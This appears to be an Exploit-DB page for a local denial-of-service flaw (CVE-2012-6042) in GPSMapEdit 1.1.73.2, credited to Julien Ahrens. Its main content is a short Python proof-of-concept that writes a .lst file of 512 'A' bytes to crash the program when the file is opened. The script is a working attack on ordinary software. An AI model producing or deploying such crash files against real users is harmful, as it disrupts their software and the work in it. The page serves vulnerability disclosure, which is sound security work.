GPSMapEdit 1.1.73.2 (.lst) - Local Denial of Service Vulnerability



EDB-ID: 18339 CVE: 2012-6042 OSVDB-ID: 82478
Author: Julien Ahrens Published: 2012-01-09 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Screenshot
Prev Home Next
#!/usr/bin/python
 
# Exploit Title: GPSMapEdit v1.1.73.2 (.lst) Local Denial of Service Vulnerability
# Version:       1.1.73.2
# Date:          2012-01-08
# Author:        Julien Ahrens
# Homepage:      www.inshell.net
# Software Link: http://www.geopainting.com
# Tested on:     Windows XP SP3 Professional German / Windows 7 Professional 64bit German
 
file="GPSMapEdit_crash.lst"
junk="\x41"*512

print "[*] Creating crash file...\n";
writeFile = open (file, "w")
writeFile.write(junk)
writeFile.close()
print "[*] File successfully created!\n\n";